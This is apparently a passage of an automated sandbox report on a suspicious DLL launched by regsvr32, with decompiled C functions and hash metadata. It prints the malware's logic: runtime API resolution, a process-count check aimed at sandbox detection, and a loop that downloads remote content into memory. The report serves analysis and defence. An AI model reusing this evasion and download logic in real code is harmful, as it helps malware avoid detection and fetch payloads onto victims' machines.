    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: DirectoryEnvironmentExpandPathStrings
    • String ID: KERNEL32.dll$Shlwapi.dll
    • API String ID: 2691487551-3851112466
    • Opcode ID: da9b1f12d797b0474d023f9a14d9b367ed72fdf292d94fa1f72c152f30da2519
    • Instruction ID: f181f0f937cd879369840a8ac0b1c1c96340f61359572026c71eb2899638bee0
    • Opcode Fuzzy Hash: da9b1f12d797b0474d023f9a14d9b367ed72fdf292d94fa1f72c152f30da2519
    • Instruction Fuzzy Hash: BB018C72A04208AADB51DBE48C44FCE737C9F98700F008995A245EA580EEF0EA848FA5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 400 6e9e17b0-6e9e1809 call 6e9e8c90 call 6e9e1490 CreateFileA
    C-Code - Quality: 100%
    			E6E9E17B0(CHAR* _a4, long _a8, long _a12, struct _SECURITY_ATTRIBUTES* _a16, long _a20, long _a24, void* _a28) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    
    				_v8 = E6E9E8C90("CreateFileA", 0xc, 0xc);
    				 *0x6e9fc95c = E6E9E1490(_v8, "kernel32.dll", 0xc, 0xc);
    				_v12 =  *0x6e9fc95c;
    				return CreateFileA(_a4, _a8, _a12, _a16, _a20, _a24, _a28);
    			}

    APIs
    • CreateFileA.KERNEL32(00000080,0000000C,0000000C,?,0000000C,0000000C,?,00000000,kernel32.dll,0000000C,0000000C,CreateFileA,0000000C,0000000C,00000080,00000000), ref: 6E9E1803
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: CreateFile
    • String ID: CreateFileA$kernel32.dll
    • API String ID: 823142352-3765438396
    • Opcode ID: 4bb49a0c23b3932aa201712ae1c58f4d67191bf57f53fd9e445ba3a92707951d
    • Instruction ID: 9265dd3aca191b3c6273d58c96ab201d2c7a213a1ff57f4fc532b0bba5d8deb3
    • Opcode Fuzzy Hash: 4bb49a0c23b3932aa201712ae1c58f4d67191bf57f53fd9e445ba3a92707951d
    • Instruction Fuzzy Hash: B5F0FF76604209FBDB04DFD8D841E9F7BB8AF8D700F008648BA05AB340D630E9118BA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 50%
    			E6E9E7770() {
    				intOrPtr _v8;
    				unsigned int _v12;
    				unsigned int _v16;
    				intOrPtr _v20;
    				char _v4116;
    
    				E6E9E9250(0x1010);
    				_v8 = E6E9E25E0(0, 0);
    				_v8( &_v4116, 0x400,  &_v12);
    				_v16 = _v12 >> 2;
    				if(_v16 < 0x32) {
    					_v20 = E6E9E2670(L"Kernel32.dll", 0);
    					_v20(0xfffffffe);
    				}
    				return 1;
    			}

    APIs
    • K32EnumProcesses.KERNEL32(?,00000400,?,00000000,00000000,?,6E9E8961), ref: 6E9E7799
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: EnumProcesses
    • String ID: 2$Kernel32.dll
    • API String ID: 84517404-3787872808
    • Opcode ID: 307dd3771b2bc9ffd8c582f2cd8606f8768713ee00a0884dd706457e29c67dd9
    • Instruction ID: 444d5e2200e3608dc0ea853bba24dfad38ee524fffccc57b2198be467aef525d
    • Opcode Fuzzy Hash: 307dd3771b2bc9ffd8c582f2cd8606f8768713ee00a0884dd706457e29c67dd9
    • Instruction Fuzzy Hash: E3F01271940309BBDB10DBD48C01BEDB778FF80704F104695EA557A6C4DBB59A40DF61
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 414 6e9e1910-6e9e195d call 6e9e8c90 call 6e9e1490 VirtualAlloc
    C-Code - Quality: 100%
    			E6E9E1910(void* _a4, long _a8, long _a12, long _a16) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    
    				_v8 = E6E9E8C90("VirtualAlloc", 0xd, 0xd);
    				 *0x6e9fc964 = E6E9E1490(_v8, "kernel32.dll", 0xd, 0xd);
    				_v12 =  *0x6e9fc964;
    				return VirtualAlloc(_a4, _a8, _a12, _a16);
    			}

    APIs
    • VirtualAlloc.KERNEL32(00003000,0000000D,0000000D,?,00000004,kernel32.dll,0000000D,0000000D,VirtualAlloc,0000000D,0000000D,00003000,00000004), ref: 6E9E1957
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID: VirtualAlloc$kernel32.dll
    • API String ID: 4275171209-2067260499
    • Opcode ID: 836196b25f638451bb8b04535fa805b37f255e3b2dc1589c5511e6df946634ad
    • Instruction ID: d048c4423ad911ae6386c17ea8ecb13d931d3c411fe28384be937f4e02d55156
    • Opcode Fuzzy Hash: 836196b25f638451bb8b04535fa805b37f255e3b2dc1589c5511e6df946634ad
    • Instruction Fuzzy Hash: 61F03075A45308BBCB10DFD8ED41FAE77B8AF89B04F008649BA05AB380D670D910DBA0
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 419 6e9e1960-6e9e19a9 call 6e9e8c90 call 6e9e1490 VirtualFree
    C-Code - Quality: 100%
    			E6E9E1960(void* _a4, long _a8, long _a12) {
    				intOrPtr _v8;
    				intOrPtr _v12;
    
    				_v8 = E6E9E8C90("VirtualFree", 0xc, 0xc);
    				 *0x6e9fc968 = E6E9E1490(_v8, "kernel32.dll", 0xc, 0xc);
    				_v12 =  *0x6e9fc968;
    				return VirtualFree(_a4, _a8, _a12);
    			}

    APIs
    • VirtualFree.KERNELBASE(00000000,0000000C,0000000C,00008000,kernel32.dll,0000000C,0000000C,VirtualFree,0000000C,0000000C,00000000,00008000), ref: 6E9E19A3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID: VirtualFree$kernel32.dll
    • API String ID: 1263568516-864021412
    • Opcode ID: f8c8a8dd56feacb4e4873455bc514924446101d3eaba1d858f1138356d30ea91
    • Instruction ID: 87701f378865daf962364f3a137623ccf8f592795d7d0e94bd7a46e06e415870
    • Opcode Fuzzy Hash: f8c8a8dd56feacb4e4873455bc514924446101d3eaba1d858f1138356d30ea91
    • Instruction Fuzzy Hash: 72F03075A45308FBEB10EFD4D841F9E7BB8AF89704F008649BA04AB380D6309950CB54
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 424 6e9e7010-6e9e703d call 6e9e22b0 call 6e9e83b0 RtlFreeHeap
    C-Code - Quality: 100%
    			E6E9E7010(void* _a4) {
    				void* _v8;
    				intOrPtr _v12;
    
    				_v12 = E6E9E22B0(L"KERNEL32.dll", 0);
    				_v8 = E6E9E83B0();
    				return RtlFreeHeap(_v8, 0, _a4);
    			}

    APIs
    • RtlFreeHeap.NTDLL(6E9FCC64,00000000,00000000,KERNEL32.dll,00000000,00000000,6E9FCC64), ref: 6E9E7037
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: FreeHeap
    • String ID: KERNEL32.dll
    • API String ID: 3298025750-254546324
    • Opcode ID: 1322675d4af1af47172684d5962eec4d576eaaf5df0fe62b05f0f6f6a0024b08
    • Instruction ID: 56a2eee3f98a49a9e6da27225f3e52e44f66830a4e88cd2d5ad5be182eb1822a
    • Opcode Fuzzy Hash: 1322675d4af1af47172684d5962eec4d576eaaf5df0fe62b05f0f6f6a0024b08
    • Instruction Fuzzy Hash: 7CD017B5D4020CFBCB24EBF49805B9EBB7C9F54201F1045A5BF00AB380DAB1AE108BE1
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    C-Code - Quality: 55%
    			E6E9E6000(intOrPtr _a4) {
    				long _v8;
    				long _v12;
    				long _v16;
    				void* _v20;
    				long _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				intOrPtr _v68;
    				void _v1092;
    				intOrPtr _t67;
    				void* _t103;
    
    				_v16 = 0;
    				_v20 = 0;
    				_v24 = 0;
    				_v8 = 0;
    				_v12 = 0;
    				_v32 = E6E9E2400(0, 0);
    				_v36 = _v32(_a4, 1, 0);
    				if(_v36 != 0) {
    					_v40 = E6E9E2610(0, 0);
    					_v16 = _v40(0, 0, 0, 0, 0);
    					__eflags = _v16;
    					if(_v16 != 0) {
    						_v44 = E6E9E26A0(0, 0);
    						_v20 = _v44(_v16, _a4, 0, 0, 0x84000000, 0);
    						__eflags = _v20;
    						if(_v20 != 0) {
    							do {
    								_v52 = E6E9E24F0(0, 0);
    								InternetReadFile(_v20,  &_v1092, 0x400,  &_v12);
    								_push(_v8 + _v12); // executed
    								_t67 = E6E9E8E3F( &_v1092, __eflags); // executed
    								_v56 = _t67;
    								_v28 = _v56;
    								E6E9E7040(_v28, _v24, _v8);
    								E6E9E7040(_v28 + _v8,  &_v1092, _v12);
    								_v60 = _v24;
    								L6E9E8E48(_v60); // executed
    								_t103 = _t103 + 8;
    								_v24 = _v28;
    								_v8 = _v8 + _v12;
    								__eflags = _v12;
    							} while (_v12 != 0);
    							_v64 = E6E9E23A0(0, 0);
    							_v64(_v20);
    							_v68 = E6E9E23A0(0, 0);
    							_v68(_v16);
    							return _v24;
    						}
    						_v48 = E6E9E23A0(0, 0);
    						_v48(_v16);
    						return 0;
    					}
    					return 0;
    				}
    				return 0;
    			}

    APIs
    • InternetCheckConnectionA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 6E9E6040
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: CheckConnectionInternet
    • String ID:
    • API String ID: 3847983778-0
    • Opcode ID: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
    • Instruction ID: d9960a1d63d374621fa3d4dd0a42bc8e977d8145208e16b03b4c5e767c2e3dd0
    • Opcode Fuzzy Hash: e552788e169462a2bed579345369851c18ea6c3a5a0a8f9b2f57dfc164da6c38
    • Instruction Fuzzy Hash: 2841F5B1E50209EFDB11DFE4C845BEEBBB4AF48705F104558E605BB280D7B4AA40CFA5
    Uniqueness

    Uniqueness Score: -1.00%

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 465 6e9ef71e-6e9ef748 call 6e9ef832 call 6e9ef4c8 470 6e9ef74e-6e9ef756 call 6e9ee649 465->470 471 6e9ef74a-6e9ef74d 465->471 473 6e9ef75b-6e9ef763 470->473 474 6e9ef765-6e9ef786 call 6e9ef92d 473->474 475 6e9ef793 473->475 480 6e9ef788-6e9ef78d call 6e9ed46d 474->480 481 6e9ef7a3-6e9ef7a7 474->481 477 6e9ef795-6e9ef7a2 call 6e9edc0e 475->477 480->475 484 6e9ef7ae-6e9ef7b9 481->484 485 6e9ef7a9 call 6e9ee8e2 481->485 486 6e9ef7bb-6e9ef7c5 484->486 487 6e9ef7d0-6e9ef7ee 484->487 485->484 486->487 490 6e9ef7c7-6e9ef7cf call 6e9edc0e 486->490 487->477 491 6e9ef7f0-6e9ef81d call 6e9ef3ba 487->491 490->487 491->477 496 6e9ef823-6e9ef82d 491->496 496->477
    C-Code - Quality: 80%
    			E6E9EF71E(signed int __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, char _a8, char _a12, void* _a16) {
    				void* _v5;
    				char _v12;
    				char _v16;
    				char* _v20;
    				char _v24;
    				void* __ebp;
    				char _t37;
    				void* _t38;
    				signed int _t46;
    				char _t49;
    				char _t56;
    				signed int _t62;
    				void* _t73;
    				void* _t79;
    				signed int _t84;
    
    				_t77 = __edx;
    				_push(_a16);
    				_push(_a12);
    				E6E9EF832(__ebx, __edx, __edi, __esi, __eflags);
    				_t37 = E6E9EF4C8(__eflags, _a4);
    				_v16 = _t37;
    				if(_t37 !=  *((intOrPtr*)( *(_a12 + 0x48) + 4))) {
    					_push(__ebx);
    					_push(__esi);
    					_push(__edi);
    					_t38 = E6E9EE649(0x220); // executed
    					_t79 = _t38;
    					_t62 = __ebx | 0xffffffff;
    					__eflags = _t79;
    					if(__eflags == 0) {
    						L5:
    						_t84 = _t62;
    					} else {
    						_t79 = memcpy(_t79,  *(_a12 + 0x48), 0x88 << 2);
    						 *_t79 =  *_t79 & 0x00000000;
    						_t84 = E6E9EF92D(_t77, __eflags, _v16, _t79);
    						__eflags = _t84 - _t62;
    						if(__eflags != 0) {
    							__eflags = _a8;
    							if(_a8 == 0) {
    								E6E9EE8E2();
    							}
    							asm("lock xadd [eax], ebx");
    							_t64 = _t62 == 1;
    							__eflags = _t62 == 1;
    							if(_t62 == 1) {
    								_t56 = _a12;
    								__eflags =  *((intOrPtr*)(_t56 + 0x48)) - 0x6e9fc1e0;
    								if( *((intOrPtr*)(_t56 + 0x48)) != 0x6e9fc1e0) {
    									E6E9EDC0E( *((intOrPtr*)(_t56 + 0x48)));
    								}
    							}
    							 *_t79 = 1;
    							_t73 = _t79;
    							_t79 = 0;
    							 *(_a12 + 0x48) = _t73;
    							_t46 =  *0x6e9fc700; // 0xfffffffe
    							__eflags =  *(_a12 + 0x350) & _t46;
    							if(__eflags == 0) {
    								_v24 =  &_a12;
    								_v20 =  &_a16;
    								_t49 = 5;
    								_v16 = _t49;
    								_v12 = _t49;
    								_push( &_v16);
    								_push( &_v24);
    								_push( &_v12);
    								E6E9EF3BA(_t64, 0, _t84, __eflags);
    								__eflags = _a8;
    								if(_a8 != 0) {
    									 *0x6e9fc1d4 =  *_a16;
    								}
    							}
    						} else {
    							 *((intOrPtr*)(E6E9ED46D(__eflags))) = 0x16;
    							goto L5;
    						}
    					}
    					E6E9EDC0E(_t79);
    					return _t84;
    				} else {
    					return 0;
    				}
    			}

    APIs
      • Part of subcall function 6E9EF4C8: GetOEMCP.KERNEL32(00000000,6E9EF739,6E9F097D,00000000,00000000,00000000,00000000,?,6E9F097D), ref: 6E9EF4F3
    • _free.LIBCMT ref: 6E9EF796
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free
    • String ID:
    • API String ID: 269201875-0
    • Opcode ID: 7d348f8776dd5c16c9b2be012ee0c71a30360a98823c1f622f93b6c74d306caf
    • Instruction ID: e7c0aa846d50081b4bd9f964ff5e0cd822da2ace39adb67adfe26636b40b97aa
    • Opcode Fuzzy Hash: 7d348f8776dd5c16c9b2be012ee0c71a30360a98823c1f622f93b6c74d306caf
    • Instruction Fuzzy Hash: E031A671904209AFDB02DFA8E840ACE77F9FF84318F21446AEA159B650EB32DD10CF50
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 77%
    			E6E9E92F6(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, void* __eflags) {
    				void* _t43;
    				char _t44;
    				signed int _t48;
    				signed int _t54;
    				signed int _t55;
    				signed int _t56;
    				signed int _t59;
    				signed char _t67;
    				signed int _t69;
    				void* _t80;
    				signed int _t86;
    				void* _t90;
    				void* _t102;
    				signed int _t110;
    				signed int _t115;
    				signed int _t119;
    				intOrPtr* _t121;
    				void* _t123;
    
    				_t113 = __esi;
    				_t106 = __edi;
    				_t105 = __edx;
    				_push(0x10);
    				E6E9E9960(__ebx, __edi, __esi);
    				_t43 = E6E9E8F8C(__ecx, __edx, 0); // executed
    				_t90 = 0x6e9fa5d0;
    				if(_t43 == 0) {
    					L11:
    					_t44 = 0;
    					__eflags = 0;
    					goto L12;
    				} else {
    					 *((char*)(_t123 - 0x1d)) = E6E9E8E91();
    					_t85 = 1;
    					 *((char*)(_t123 - 0x19)) = 1;
    					 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    					_t132 =  *0x6e9fcfc8;
    					if( *0x6e9fcfc8 != 0) {
    						E6E9E9839(_t105, __edi, __esi, 7);
    						asm("int3");
    						_push(0x10);
    						_push(0x6e9fa5f0);
    						E6E9E9960(1, __edi, __esi);
    						_t48 =  *0x6e9fcfec; // 0x0
    						__eflags = _t48;
    						if(_t48 > 0) {
    							 *0x6e9fcfec = _t48 - 1;
    							 *(_t123 - 0x1c) = 1;
    							 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    							 *((char*)(_t123 - 0x20)) = E6E9E8E91();
    							 *(_t123 - 4) = 1;
    							__eflags =  *0x6e9fcfc8 - 2;
    							if( *0x6e9fcfc8 != 2) {
    								E6E9E9839(_t105, 1, _t113, 7);
    								asm("int3");
    								_push(0xc);
    								_push(0x6e9fa618);
    								E6E9E9960(1, 1, _t113);
    								_t110 =  *(_t123 + 0xc);
    								__eflags = _t110;
    								if(_t110 != 0) {
    									L23:
    									 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    									__eflags = _t110 - 1;
    									if(_t110 == 1) {
    										L26:
    										_t86 =  *(_t123 + 0x10);
    										_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    										 *(_t123 - 0x1c) = _t115;
    										__eflags = _t115;
    										if(_t115 != 0) {
    											_t55 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86); // executed
    											_t115 = _t55;
    											 *(_t123 - 0x1c) = _t115;
    											__eflags = _t115;
    											if(_t115 != 0) {
    												goto L28;
    											}
    										}
    									} else {
    										__eflags = _t110 - 2;
    										if(_t110 == 2) {
    											goto L26;
    										} else {
    											_t86 =  *(_t123 + 0x10);
    											L28:
    											_push(_t86);
    											_push(_t110);
    											_push( *((intOrPtr*)(_t123 + 8)));
    											_t56 = E6E9E9A40();
    											_t115 = _t56;
    											 *(_t123 - 0x1c) = _t115;
    											__eflags = _t110 - 1;
    											if(_t110 == 1) {
    												__eflags = _t115;
    												if(_t115 == 0) {
    													_push(_t86);
    													_push(_t56);
    													_push( *((intOrPtr*)(_t123 + 8)));
    													_t59 = E6E9E9A40();
    													__eflags = _t86;
    													_t34 = _t86 != 0;
    													__eflags = _t34;
    													_push((_t59 & 0xffffff00 | _t34) & 0x000000ff);
    													L14();
    													_pop(_t90);
    													E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t115, _t86);
    												}
    											}
    											__eflags = _t110;
    											if(_t110 == 0) {
    												L33:
    												_t115 = E6E9E92A3(_t86, _t90, _t105, _t110, _t115,  *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    												 *(_t123 - 0x1c) = _t115;
    												__eflags = _t115;
    												if(_t115 != 0) {
    													_t115 = E6E9E95B8( *((intOrPtr*)(_t123 + 8)), _t110, _t86);
    													 *(_t123 - 0x1c) = _t115;
    												}
    											} else {
    												__eflags = _t110 - 3;
    												if(_t110 == 3) {
    													goto L33;
    												}
    											}
    										}
    									}
    									 *(_t123 - 4) = 0xfffffffe;
    									_t54 = _t115;
    								} else {
    									__eflags =  *0x6e9fcfec - _t110; // 0x0
    									if(__eflags > 0) {
    										goto L23;
    									} else {
    										_t54 = 0;
    									}
    								}
    								 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    								return _t54;
    							} else {
    								E6E9E8F5C(1, _t90, 1, _t113);
    								E6E9E9A52();
    								E6E9E9AB3();
    								 *0x6e9fcfc8 =  *0x6e9fcfc8 & 0x00000000;
    								 *(_t123 - 4) =  *(_t123 - 4) & 0x00000000;
    								E6E9E9492();
    								_t67 = E6E9E90FE( *((intOrPtr*)(_t123 + 8)), 0);
    								asm("sbb esi, esi");
    								_t119 =  ~(_t67 & 0x000000ff) & 1;
    								__eflags = _t119;
    								 *(_t123 - 0x1c) = _t119;
    								 *(_t123 - 4) = 0xfffffffe;
    								E6E9E949F();
    								_t69 = _t119;
    								goto L18;
    							}
    						} else {
    							_t69 = 0;
    							L18:
    							 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    							return _t69;
    						}
    					} else {
    						 *0x6e9fcfc8 = 1;
    						if(E6E9E8EEE(_t132) != 0) {
    							E6E9E9A46(E6E9E9A87());
    							E6E9E9A64();
    							_t80 = E6E9ED38A(0x6e9f51fc, 0x6e9f520c);
    							_pop(_t102);
    							if(_t80 == 0 && E6E9E8EC3(1, _t102) != 0) {
    								E6E9ED345(_t102, 0x6e9f51bc, 0x6e9f51f8);
    								 *0x6e9fcfc8 = 2;
    								_t85 = 0;
    								 *((char*)(_t123 - 0x19)) = 0;
    							}
    						}
    						 *(_t123 - 4) = 0xfffffffe;
    						E6E9E93D9();
    						if(_t85 != 0) {
    							goto L11;
    						} else {
    							_t121 = E6E9E9A81();
    							_t138 =  *_t121;
    							if( *_t121 != 0) {
    								_push(_t121);
    								if(E6E9E904D(_t85, _t106, _t121, _t138) != 0) {
    									 *0x6e9f51b8( *((intOrPtr*)(_t123 + 8)), 2,  *(_t123 + 0xc));
    									 *((intOrPtr*)( *_t121))();
    								}
    							}
    							 *0x6e9fcfec =  *0x6e9fcfec + 1;
    							_t44 = 1;
    						}
    						L12:
    						 *[fs:0x0] =  *((intOrPtr*)(_t123 - 0x10));
    						return _t44;
    					}
    				}
    			}

    APIs
    • __RTC_Initialize.LIBCMT ref: 6E9E9343
      • Part of subcall function 6E9E9A46: InitializeSListHead.KERNEL32(6E9FD000,6E9E934D,6E9FA5D0,00000010,6E9E92DE,?,?,?,6E9E9506,?,00000001,?,?,00000001,?,6E9FA618), ref: 6E9E9A4B
    • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6E9E93AD
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
    • String ID:
    • API String ID: 3231365870-0
    • Opcode ID: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
    • Instruction ID: 1f9e2ce47f36c12276604c886fedb7f981b2522d77d978232cdf8bed53d5285e
    • Opcode Fuzzy Hash: be01c6001a90c430601058da48e894e1ed9c6bde63d394e67dce23cafec00db2
    • Instruction Fuzzy Hash: 79210232608302EEDB56ABF894107DC73A99FA232DF105889CB416BAC1CB32D585CE65
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E6E9ECC7D(void* __eax, void* __ebx, void* __ecx, void* __edx) {
    
    				 *((intOrPtr*)(__ebx + __eax + 0x33)) =  *((intOrPtr*)(__ebx + __eax + 0x33)) + __edx;
    			}

    APIs
      • Part of subcall function 6E9EFD93: GetEnvironmentStringsW.KERNEL32 ref: 6E9EFD9C
      • Part of subcall function 6E9EFD93: _free.LIBCMT ref: 6E9EFDFB
      • Part of subcall function 6E9EFD93: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6E9EFE0A
    • _free.LIBCMT ref: 6E9ECCBD
    • _free.LIBCMT ref: 6E9ECCC4
    Memory Dump Source
    • Source File: 00000002.00000002.437552917.000000006E9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6E9E0000, based on PE: true
    • Associated: 00000002.00000002.437545366.000000006E9E0000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437578674.000000006E9F5000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437594395.000000006E9FC000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000002.00000002.437601619.000000006E9FE000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_6e9e0000_regsvr32.jbxd
    Similarity
    • API ID: _free$EnvironmentStrings$Free
    • String ID:
    • API String ID: 2490078468-0
    • Opcode ID: 537832dc6da1922539afd246919468175b255e4c31c533adb7db7f04889f717c
    • Instruction ID: d65021eba81d12dfc8e10144ea42a22640ac40216212b58cf53f6e1c54aeeeff
    • Opcode Fuzzy Hash: 537832dc6da1922539afd246919468175b255e4c31c533adb7db7f04889f717c
    • Instruction Fuzzy Hash: 59E0A02398994049A22316FA794279D1B4D4FD233DB290E16D6508EAC4DBA0C4020D92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E6E9E8E01(signed int __edx, void* __eflags, intOrPtr _a4) {
    				signed int _v16;
    				signed int _v20;
    				signed int _v24;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _v40;
    				signed int _v44;
    				signed int _v48;
    				void* _t54;
    				signed int _t55;
    				signed int _t59;
    				intOrPtr _t72;
    				signed int _t73;
    				signed int _t74;
    				signed int _t75;
